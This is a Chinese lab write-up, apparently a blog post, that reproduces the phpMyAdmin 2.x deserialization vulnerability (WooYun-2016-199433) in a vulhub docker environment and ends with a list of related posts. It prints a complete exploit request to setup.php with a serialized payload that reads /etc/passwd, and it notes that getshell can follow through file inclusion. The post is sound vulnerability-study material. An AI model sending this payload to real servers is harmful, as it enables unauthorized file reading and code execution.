WooYun-2016-199433 phpmyadmin反序列化漏洞复现
目录
- 漏洞描述
- 影响版本
- 漏洞环境搭建
- 漏洞分析
- 漏洞利用
- 漏洞加固
漏洞描述
phpmyadmin 2.x 版本中存在反序列化漏洞,当服务器执行了黑客精心构造的payload时,会造成类中的变量被修改,可以任意读取文件或任意执行代码。
影响版本
phpMyAdmin 2.x版本
漏洞环境搭建
使用vulhub直接docker一键启动环境WooYun-2016-199433
环境
docker快速入门以及漏洞环境搭建
下载安装好vulhub后进入/vulhub/phpmyadmin/WooYun-2016-199433
目录,执行以下命令启动环境
sudo docker-compose up -d
安装成功后查看端口,发现端口被映射在我们8080端口上
访问虚拟机中localhost:8080,出现以下界面,表示安装成功
漏洞分析
漏洞分析文章
漏洞利用
读取/etc/passwd文件
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
这个漏洞是不能读取php文件,因为有了eval(),相当于任意文件包含了。
getshell需要包含上传的木马文件,也可以包含日志文件。但docker环境中并未开启日志功能,也没有上传点。所以就不进行getshell演示了,感兴趣的话可以看以下这篇文章。
PhpMyAdmin某版本无需登录任意文件包含导致代码执行(可getshell)漏洞分析
漏洞加固
更新PHPmyadmin
WooYun-2016-199433 phpmyadmin反序列化漏洞复现相关推荐
- JBoss 反序列化漏洞复现
JBoss 反序列化漏洞复现 漏洞描述: 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主 ...
- CVE-2020-15148--Yii2 反序列化漏洞复现
目录 简介: 环境部署: 知识点: 分析: 复现: 参考链接: 其他问题: 简介: Yii Framework是一个基于组件.用于开发大型Web应用的高性能 PHP 框架.Yii提供了今日Web 2. ...
- Fastjson 1.2.24 反序列化漏洞复现
Fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎.Fastjson是其中的一个基于Java的JSON解析器/生成器. Pippo ...
- [Vulhub](WooYun-2016-199433)phpmyadmin反序列化漏洞
0x00 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程.在序列化期间,对象将其当前状态写入到临时或持久性存储区.以后,可以通过从存储区中读取 ...
- WooYun-2016-199433 phpmyadmin 反序列化漏洞
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码. 漏洞复现 执行如下命令启动phpmyadmin: docker-compose u ...
- 追洞小组 | Jdbc反序列化漏洞复现浅析
目录 1.前言+靶场搭建 2.漏洞复现 3.漏洞分析 4.漏洞修复 5.心得 前言+靶场搭建 很多时候我们获得密码之后进入后台管理的界面,有些上传的漏洞或者sql注入无法getshell,但是如 ...
- typecho反序列化漏洞复现
typecho框架存在反序列化漏洞,利用此漏洞可执行任意代码 环境搭建 第一步 第二步 第三步 第三步 第四步 第五步 第六步 第七步 第八步 第九步 漏洞分析 typecho\build\insta ...
- Fastjson1.2.47反序列化漏洞复现
一.漏洞描述 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中.Fastjson提供了autotype功能,允许用户在反序列化数据中通过&quo ...
- 【漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE-2016-4437)
前言: Apache Shiro是一款开源安全框架,提供身份验证.授权.密码学和会话管理.Shiro框架直观.易用,同时也能提供健壮的安全性. 影响版本: Apache Shiro <= 1.2 ...
最新文章
- vue + skyline 搭建 一个开发环境
- 中国新十大军工企业名单及简称
- php传递参数给asp.net,asp.net 传值总结
- 【开发记录】Linux常用命令记录(一)
- UVA10125 POJ2549 Sumsets【暴力+二分】
- 《BGP设计与实现》一2.11 总结
- 每日一题/012/数学分析/求极限/拉格拉日中值定理/幂指函数求导
- 用户画像——《大数据用户画像的方法及营销实践》演讲
- android系统蓝牙自动连接
- android 自动翻页插件,网页自动翻页Chrome插件下载
- python怎么爬取excel_求教! Python爬取的数据 怎么写入Excel表格中
- 正负数在计算机中的存储方式
- 2018“人工智能”:是彻底复苏?还是起落轮回?| 抢票
- 程序员的自我涵养,写好代码的实战经历分享
- 在Macbook中安装破解版软件后出现“文件已损坏”的解决办法
- 高清加载巨图方案-拒绝压缩图片
- java POI下载自定义EXCEL模板
- 1662_MIT 6.828 JOS check_page_free_list实现分析以及boot_alloc问题修复
- navicat永久使用权
- ThinkPHP和uniapp开发的CRM售后管理系统(客户、合同、工单、任务、报价、产品、库存、出纳、收费)
热门文章
- FISCO BCOS 生态中的数字身份组件 WeIdentity 用 Sqlite 存储 WeId | Rust 学习
- Lodop打印表格包含页眉和页码
- 电脑视频声音小解决办法
- 浅析阿里云校招笔试题目之投骰子
- 中学数学课程标准(教学大纲)的传承与变迁
- uniapp下载文件并打开
- 全球同服 游戏服务器架构设计
- “白领工资标准”是炒作抑或是无聊之作?
- 和画意思相近的字_和“成”字意思相近的字有哪些?有诗意的四字词语有哪些?...
- NLP(四十七)文本纠错之获取形近字